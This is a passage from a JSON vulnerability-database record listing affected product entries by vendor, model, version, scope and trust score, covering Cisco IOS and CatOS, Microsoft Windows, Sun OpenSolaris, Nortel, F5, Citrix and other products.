        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6(3)"
      },
      {
        "model": "opensolaris build snv 49",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "windows server web edition sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "networks ethernet routing switch 2550t",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "2500"
      },
      {
        "model": "ios 12.4jma",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.3ja",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2zm",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows server sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows advanced server sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6(19.2)"
      },
      {
        "model": "access gateway enterprise edition",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "8.1.68.7"
      },
      {
        "model": "ios 12.0wc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 114",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.0xk",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2ixa",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "suse linux retail solution",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "8.0"
      },
      {
        "model": "networks self-service ccss7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "-0"
      },
      {
        "model": "networks self-service peri nt server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "0"
      },
      {
        "model": "linux enterprise desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "opensolaris build snv 128",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.2 sxh5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 85",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "opensolaris build snv 19",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "windows vista edition sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "x64"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70000"
      },
      {
        "model": "opensolaris build snv 107",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "stonegate ips sensor and analyzer",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "stonesoft",
        "version": "5.0.2"
      },
      {
        "model": "netscaler build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "8.157.3"
      },
      {
        "model": "opensolaris build snv 45",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "coat systems proxysg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "blue",
        "version": "4.2"
      },
      {
        "model": "ios 12.3yx",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows server datacenter edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "ios 12.0xb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.5"
      },
      {
        "model": "ios 12.1xh",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2sra",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2zya",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "cms server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "14.1"
      },
      {
        "model": "suse linux standard server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "8.0"
      },
      {
        "model": "ios 12.2cx",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1ay",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xe",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "rt105p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "yamaha",
        "version": "0"
      },
      {
        "model": "opensolaris build snv 78",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.2by",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 108",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "bigip wan optimization module",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0"
      },
      {
        "model": "ios 12.2 sxf16",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 28",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.1xl",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks self-service peri workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "0"
      },
      {
        "model": "windows advanced server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "ios 12.2b",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "firepass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "6.0.3"
      },
      {
        "model": "ios 12.2zx",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "bigip application security manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "9.3.1"
      },
      {
        "model": "ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "12.4(25)"
      },
      {
        "model": "ios 12.2sq",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 89",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "windows server standard edition sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "networks callpilot 703t",
        "scope": null,
        "trust": 0.3,
        "vendor": "nortel",
        "version": null
      },
      {
        "model": "ios 12.2xu",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.5(4)"
      },
      {
        "model": "ir",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "windows datacenter server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "ios 12.3jx",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 39",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "coat systems proxysg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "blue",
        "version": "5.2.2.5"
      },
      {
        "model": "open-enterprise-server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "0"
      },
      {
        "model": "ios 12.4 xe4",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks ethernet routing switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "8600"
      },
      {
        "model": "rt102i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "yamaha",
        "version": "0"
      },
      {
        "model": "ios 12.0xq",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "bigip global traffic manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "9.4.8"
      },
      {
        "model": "point vpn-1 pro/express r62 hfa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "check",
        "version": "01"
      },
      {
        "model": "cms server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "14.0"
      },
      {
        "model": "ios 12.4jdd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1ec",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xh",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 90",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "opensolaris build snv 68",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "suse linux school server for i386",
        "scope": null,
        "trust": 0.3,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "ios 12.2svd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.3"
      },
      {
        "model": "windows server for itanium-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20080"
      },
      {
        "model": "ios 12.1xj",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.3xl",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xi",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "netscaler",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "9.1"
      },
      {
        "model": "opensolaris build snv 67",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "opensolaris build snv 120",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.2ze",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2 sxi1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2cy",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows xp home sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "opensolaris build snv 51",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.4 t1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2bx",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "access gateway enterprise edition build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "9.196.4"
      },
      {
        "model": "ios 12.0da",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4xa",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2sxa",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows vista home basic sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios 12.3xg",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios xe",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.2.3"
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.5(6)"
      },
      {
        "model": "ios 12.2ey",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 77",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.2src",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6(2)"
      },
      {
        "model": "opensolaris build snv 61",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.0xj",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6(17)"
      },
      {
        "model": "ios 12.2ez",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "rta54i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "yamaha",
        "version": "0"
      },
      {
        "model": "ios 12.3xc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows server enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.1(1)"
      },
      {
        "model": "ios 12.2dd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "stonegate ips sensor and analyzer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "stonesoft",
        "version": "4.2.3"
      },
      {
        "model": "ios 12.0xt",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0st",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.3ys",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 82",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "windows vista sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "coat systems proxysg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "blue",
        "version": "5.2.4.8"
      },
      {
        "model": "opensolaris build snv 29",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.4xl",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "nx-os 4.0 n2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "pix/asa",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.1(2.3)"
      },
      {
        "model": "ios 12.1yj",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks contact center express",
        "scope": null,
        "trust": 0.3,
        "vendor": "nortel",
        "version": null
      },
      {
        "model": "opensolaris build snv 41",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "networks ethernet routing switch 4524gt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "4500"
      },
      {
        "model": "ios 12.2sxb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "bigip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "9.4.8"
      },
      {
        "model": "windows vista business 64-bit edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "0"
      },
      {
        "model": "ios 12.4xt",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2xm",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2sea",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2ixb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 126",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.1xp",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2ixh",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2seg",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "point software vpn-1 power/utm r62 hfa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "check",
        "version": "01"
      },
      {
        "model": "ios 12.4yb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2 ey",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "bigip application security manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "9.4.8"
      },
      {
        "model": "ios 12.2xc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks self-service mps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "1000"
      },
      {
        "model": "ios 12.4 md7",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows server enterprise edition sp1 beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20031"
      },
      {
        "model": "bigip global traffic manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "9.3"
      },
      {
        "model": "ios 12.2svc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sun",
        "version": "8"
      },
      {
        "model": "ios 12.1xw",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows advanced server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "ios 12.1xu",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4 t2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4 ja1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "pix/asa",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.1(2.79)"
      },
      {
        "model": "ios 12.2seb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows xp media center edition sp3",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios 12.2yy",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2ixg",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2t",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows vista ultimate sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "networks ethernet routing switch 5650td",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "5000"
      },
      {
        "model": "ios 12.2xg",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1cx",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catos 8.4",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "pix/asa",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.0(4.9)"
      },
      {
        "model": "rt200i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "yamaha",
        "version": "0"
      },
      {
        "model": "netscaler",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "9.1.100.3"
      },
      {
        "model": "opensolaris build snv 130",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.2fy",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2 xo",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows server enterprise edition sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003x64"
      },
      {
        "model": "ios 12.1yf",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2yp",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.1(2)"
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.1(3)"
      },
      {
        "model": "networks callpilot 600r",
        "scope": null,
        "trust": 0.3,
        "vendor": "nortel",
        "version": null
      },
      {
        "model": "windows server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "opensolaris build snv 105",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.4jmb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks ethernet routing switch 2526t",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "2500"
      },
      {
        "model": "ios 12.2so",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows server standard edition sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "ios 12.2s",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "coat systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "blue",
        "version": "0"
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.1(1)"
      },
      {
        "model": "ios 12.4ye",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "access gateway enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "9.0"
      },
      {
        "model": "ios 12.2yd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "linux enterprise sdk sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "netscaler access gateway enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "9.0"
      },
      {
        "model": "windows vista",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "0"
      },
      {
        "model": "networks ethernet routing switch 4550t",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "4500"
      },
      {
        "model": "windows server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003x64"
      },
      {
        "model": "bigip sam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "8.0"
      },
      {
        "model": "ios 12.2sxf",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 88",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.2ixc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "rt58i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "yamaha",
        "version": "0"
      },
      {
        "model": "ios 12.4 jdc",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0 sy10",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks symposium agent",
        "scope": null,
        "trust": 0.3,
        "vendor": "nortel",
        "version": null
      },
      {
        "model": "ios 12.2ixd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "point vpn-1 pro/express r60 hfa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "check",
        "version": "07"
      },
      {
        "model": "cms server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "16.0"
      },
      {
        "model": "opensolaris build snv 111",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.4(0.63)"
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.6(1)"
      },
      {
        "model": "ios 12.1ev",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 118",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.2"
      },
      {
        "model": "ios 12.2jk",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows vista home premium sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios 12.4jdc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.3yd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 59",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "windows datacenter server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "access gateway enterprise edition build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "9.070.5"
      },
      {
        "model": "ios 12.0xn",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.5(5)"
      },
      {
        "model": "ios 12.2xj",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks contact center administration ccma",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "6.0"
      },
      {
        "model": "ios 12.3jk",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows vista home basic 64-bit edition sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios 12.3ym",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows advanced server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "opensolaris build snv 112",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "stonegate ssl vpn engine",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "stonesoft",
        "version": "1.3.1"
      },
      {
        "model": "ios 12.2bc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xr",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2ixf",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4mr",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.3 yx14",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "messaging application server mm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "ios 12.2sy",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2 sve1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "stonegate ips sensor and analyzer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "stonesoft",
        "version": "4.3.6"
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
